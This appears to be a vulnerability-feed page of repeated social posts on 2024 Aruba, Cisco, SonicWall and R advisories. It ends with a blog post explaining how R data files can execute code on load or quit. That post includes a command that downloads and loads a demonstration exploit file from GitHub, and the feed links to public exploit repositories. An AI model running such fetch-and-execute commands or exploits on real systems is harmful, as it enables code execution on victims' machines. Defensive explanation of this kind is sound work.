Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##updated 2024-05-01T19:50:25.633000
12 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-26304: CVSS 9.8
There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
CVSS 9.8 Buffer overflow -> RCE in ArubaOS:
There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products
=================
HPE Aruba Networking
- Mobility Conductor (formerly Mobility Master)
- Mobility Controllers
- WLAN Gateways and SD-WAN Gateways managed by Aruba Central
Affected Software Versions:
- ArubaOS 10.5.x.x: 10.5.1.0 and below
- ArubaOS 10.4.x.x: 10.4.1.0 and below
- ArubaOS 8.11.x.x: 8.11.2.1 and below
- ArubaOS 8.10.x.x: 8.10.0.10 and below
The following ArubaOS and SD-WAN software versions that are End
of Maintenance are affected by these vulnerabilities and are not
patched by this advisory:
- ArubaOS 10.3.x.x: all
- ArubaOS 8.9.x.x: all
- ArubaOS 8.8.x.x: all
- ArubaOS 8.7.x.x: all
- ArubaOS 8.6.x.x: all
- ArubaOS 6.5.4.x: all
- SD-WAN 8.7.0.0-2.3.0.x: all
- SD-WAN 8.6.0.4-2.2.x.x: all
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-26304: CVSS 9.8
There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
CVSS 9.8 Buffer overflow -> RCE in ArubaOS:
There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products
=================
HPE Aruba Networking
- Mobility Conductor (formerly Mobility Master)
- Mobility Controllers
- WLAN Gateways and SD-WAN Gateways managed by Aruba Central
Affected Software Versions:
- ArubaOS 10.5.x.x: 10.5.1.0 and below
- ArubaOS 10.4.x.x: 10.4.1.0 and below
- ArubaOS 8.11.x.x: 8.11.2.1 and below
- ArubaOS 8.10.x.x: 8.10.0.10 and below
The following ArubaOS and SD-WAN software versions that are End
of Maintenance are affected by these vulnerabilities and are not
patched by this advisory:
- ArubaOS 10.3.x.x: all
- ArubaOS 8.9.x.x: all
- ArubaOS 8.8.x.x: all
- ArubaOS 8.7.x.x: all
- ArubaOS 8.6.x.x: all
- ArubaOS 6.5.4.x: all
- SD-WAN 8.7.0.0-2.3.0.x: all
- SD-WAN 8.6.0.4-2.2.x.x: all
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-26304: CVSS 9.8
There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
CVSS 9.8 Buffer overflow -> RCE in ArubaOS:
There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products
=================
HPE Aruba Networking
- Mobility Conductor (formerly Mobility Master)
- Mobility Controllers
- WLAN Gateways and SD-WAN Gateways managed by Aruba Central
Affected Software Versions:
- ArubaOS 10.5.x.x: 10.5.1.0 and below
- ArubaOS 10.4.x.x: 10.4.1.0 and below
- ArubaOS 8.11.x.x: 8.11.2.1 and below
- ArubaOS 8.10.x.x: 8.10.0.10 and below
The following ArubaOS and SD-WAN software versions that are End
of Maintenance are affected by these vulnerabilities and are not
patched by this advisory:
- ArubaOS 10.3.x.x: all
- ArubaOS 8.9.x.x: all
- ArubaOS 8.8.x.x: all
- ArubaOS 8.7.x.x: all
- ArubaOS 8.6.x.x: all
- ArubaOS 6.5.4.x: all
- SD-WAN 8.7.0.0-2.3.0.x: all
- SD-WAN 8.6.0.4-2.2.x.x: all
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-26304: CVSS 9.8
There is a buffer overflow vulnerability in the underlying L2/L3 Management service that could lead to unauthenticated remote codeby sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.
CVSS 9.8 Buffer overflow -> RCE in ArubaOS:
There is a buffer overflow vulnerability in the underlying Utility daemon that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Note that it says "results in the ability," not "may result in the ability" to execute remote code.
Affected Products
=================
HPE Aruba Networking
- Mobility Conductor (formerly Mobility Master)
- Mobility Controllers
- WLAN Gateways and SD-WAN Gateways managed by Aruba Central
Affected Software Versions:
- ArubaOS 10.5.x.x: 10.5.1.0 and below
- ArubaOS 10.4.x.x: 10.4.1.0 and below
- ArubaOS 8.11.x.x: 8.11.2.1 and below
- ArubaOS 8.10.x.x: 8.10.0.10 and below
The following ArubaOS and SD-WAN software versions that are End
of Maintenance are affected by these vulnerabilities and are not
patched by this advisory:
- ArubaOS 10.3.x.x: all
- ArubaOS 8.9.x.x: all
- ArubaOS 8.8.x.x: all
- ArubaOS 8.7.x.x: all
- ArubaOS 8.6.x.x: all
- ArubaOS 6.5.4.x: all
- SD-WAN 8.7.0.0-2.3.0.x: all
- SD-WAN 8.6.0.4-2.2.x.x: all
updated 2024-05-01T19:50:25.633000
4 posts
Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##updated 2024-05-01T18:31:25
4 posts
Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##updated 2024-05-01T18:31:20
4 posts
SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##SonicWall security advisory: GMS ECM MULTIPLE VULNERABILITIES
Affected Products: GMS (Virtual Appliance, Windows) - 9.3.4 and earlier versions. Fixed software: 9.4.0 (Build 9.4-9400.1040) and later versions. Not exploited.
#SonicWall #PatchTuesday #vulnerability #SonicWallGMS #CVE_2024_29010 #CVE_2024_29011
##updated 2024-05-01T18:31:19
4 posts
Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##Cisco security advisory: Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware Vulnerabilities
Cisco has released free software updates that address the vulnerabilities described in this advisory... The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability
[sic]
that is described in this advisory.
#CVE_2024_20357 #CVE_2024_20376 #CVE_2024_20378 #Cisco #PatchTuesday #vulnerability
##updated 2024-05-01T18:15:24.140000
2 posts
Flatpak just received a new update 👀
New features:
Bug fixes:
Internal changes:
Flatpak just received a new update 👀
New features:
Bug fixes:
Internal changes:
updated 2024-05-01T18:15:13.200000
1 posts
3 repos
https://github.com/Notselwyn/CVE-2024-1086
updated 2024-05-01T15:30:44
8 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-33511: CVSS 9.8
There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Again, "results in."
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-33511: CVSS 9.8
There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Again, "results in."
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-33511: CVSS 9.8
There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Again, "results in."
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##CVE-2024-33511: CVSS 9.8
There is a buffer overflow vulnerability in the underlying Automatic Reporting service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port(8211). Successful exploitation of this vulnerability results in the ability to execute arbitrary code as a privileged user on the underlying operating system.Again, "results in."
updated 2024-05-01T15:30:44
4 posts
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##updated 2024-05-01T15:30:37
2 posts
1 repos
https://github.com/Roud-Roud-Agency/CVE-2024-26304-RCE-exploits
HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##HPE Aruba Networking security advisory: ARUBA-PSA-2024-004 ArubaOS Multiple Vulnerabilities
On 30 April 2024, HPE Aruba Networking released a security advisory, announcing 10 security vulnerabilities and patches for them. 4 vulnerabilities are rated critical:
3 of the other 6 vulnerabilities are 5.9 medium buffer overflow to arbitrary code execution, and the last 3 are 5.3 medium Denial of Service. HPE Aruba Networking recommends upgrading Mobility Controllers, Mobility Conductors and Gateways to one of the following ArubaOS versions (as applicable) to resolve all the vulnerabilities described in the details section:
They are not aware of any public discussion or exploit code targeting these specific vulnerabilities as of the release date of the advisory. See related Bleeping Computer reporting: HPE Aruba Networking fixes four critical RCE flaws in ArubaOS
#Aruba #vulnerability #CVE_2024_26305 #CVE_2024_2604 #CVE_2024_33511 #CVE_2024_33512 #PatchTuesday
##updated 2024-04-29T21:30:34
28 posts
Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured
##Vulnerability in R Programming Language Could Fuel Supply Chain Attacks https://www.securityweek.com/vulnerability-in-r-programming-language-enables-supply-chain-attacks/ #Vulnerabilities #vulnerability #CVE202427322 #Featured
##CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.
CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.
CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.
CISA: CERT/CC Reports R Programming Language Vulnerability
I ignored this one but even CISA thinks it's worth mentioning: CVE-2024-27322 (8.8 high) Deserialization of untrusted data in R statistical #Rstats programming language could allow for arbitrary code execution. A cyber threat actor could exploit this vulnerability to take control of an affected system.
Direct link to CERT/CC advisory.
CVE-2024-27322 Should Never Have Been Assigned And R Data Files Are Still Super Risky Even In R 4.4.0 – Source: securityboulevard.com https://ciso2ciso.com/cve-2024-27322-should-never-have-been-assigned-and-r-data-files-are-still-super-risky-even-in-r-4-4-0-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #CyberSecurityNews #SecurityBoulevard #R
##I ended up having to burn time I honestly don't have this week to blog the stuff from the repo I made yesterday due to CERT and CISA making a big deal (https://www.cisa.gov/news-events/alerts/2024/05/01/certcc-reports-r-programming-language-vulnerability) out of expected behavior in #RStats due to a daft, hype-seeking vendor.
The profession that is cybersecurity is stupid broken.
I rly want (someone) to pwn an org with this CVE just to get it on KEV for sad posterity.
##I had not planned to blog this (this is an incredibly time-crunched week for me) but CERT/CC and CISA made a big deal out of a non-vulnerability in R, and it’s making the round on socmed, so here we are.
A security vendor decided to try to get some hype before 2024 RSAC and made a big deal out of what was/is known expected behavior in R data files. R Core took some measures to address the issue they outlined, but for the love of Henry, PLEASE do not think R data files are safe to handle if you weren’t the one creating them, or you do not fully know the provenance of them.
Konrad Rudolph and Iakov Davydov did some ace cyber sleuthing and figured out other ways R data file deserialization can be abused. Please take a moment and drop a note on Mastodon to them saying “thank you”. This is excellent work. We need more folks like them in this ecosystem.
Like many programming languages, R has many footguns, and R data files are one of them. R objects are wonderful beasts, and being able to serialize and deserialize those beasts is a super helpful bit of functionality. Also, R has something called active bindings. Amongst other things, they let you access an object to get a value, but — in doing so — code can get executed without you knowing it. Whether an R data file has an object with active bindings or not, it can be abused by attackers.
When you load()
an R data file directly into your R session and into the global environment, the object(s) in it will, well, load there. So, if it has an object named print
that’s going to be in your global environment and get called when print()
gets called. Lather/rinse/repeat for any other object name. It should be pretty obvious how this could be abused.
A tad more insidious is what happens when you quit R. By default, on quit()
, unless you specify otherwise, that function invocation will also call .Last()
if it exists in the environment. This functionality exists in the event things need to be cleaned up. One “nice” aspect of .
-prefixed R objects is that they’re hidden by default from the environment. So, you may not even notice if an R data file you’ve loaded has that defined. (You likely do not check what’s loaded anyway.)
It’s also possible to create custom R objects that have their own “finalizers” (ref reg.finalizer
), which will also get called by default when the objects are being destroyed on quit.
There are also likely other ways to trigger unwanted behavior.
If you want to see how this works, start R from RStudio, the command line, or R GUI. Then, execute the following R code:
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
Then, quit R/RStudio/R GUI (this will be less dramatic on linux, but the demo should still be effective).
If you must take in untrusted R data files, keep reading.
I threw together an R script along with a safer way to use it (a Docker container) to help R folks inspect the contents of R data files before actually using them. It also looks for some basic shady stuff and alerts you if it finds them. It’s a WIP, and issues + thoughtful PRs are welcome.
If one were to run Rscript check.R
from that repo with that exploit.rda
file as a parameter, one would see this:
